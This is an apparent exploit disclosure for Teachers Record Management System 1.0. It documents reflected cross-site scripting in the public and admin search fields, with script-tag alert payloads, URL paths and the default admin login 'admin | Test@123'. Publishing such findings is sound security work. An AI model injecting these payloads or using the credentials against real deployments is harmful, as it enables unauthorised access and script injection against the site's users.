# Exploit Title: Teachers Record Management System 1.0 - 'Reflected' Cross Site Scripting (xss) in Search Options
# Date: 10 July 2021
# Exploit Author: Subhadip Nag (mrl0s3r)
# Author Linkedin: www.linkedin.com/in/subhadip-nag-09/
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Tested on: Server: XAMPP
##################################################################################################################################################################
# Description #
Teachers Record Management System 1.0 - 'Reflected' Cross Site Scripting (xss) in Search Options. Showing us All Teacher Details.
##################################################################################################################################################################
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/TRMSP/trms/
2) In the search option, Enter the payload: <script>alert('XSS')</script>
3) our XSS attack successfull
4) Goto: http://localhost/TRMSP/trms/admin/index.php
5) Login as a admin with given credentials: admin | Test@123
6) Goto: http://localhost/TRMSP/trms/admin/search.php
7) In the 'search by name or Subject', Enter the payload: <script>alert(1)</script>
8) Our XSS attack successful
##################################################################################################################################################################
# PoC image
1) https://ibb.co/Vxf7Cxy
2) https://ibb.co/t3GG3Zp
3) https://ibb.co/Vxf7Cxy
4) https://ibb.co/x7mMRnk
5) https://ibb.co/NNm7tNP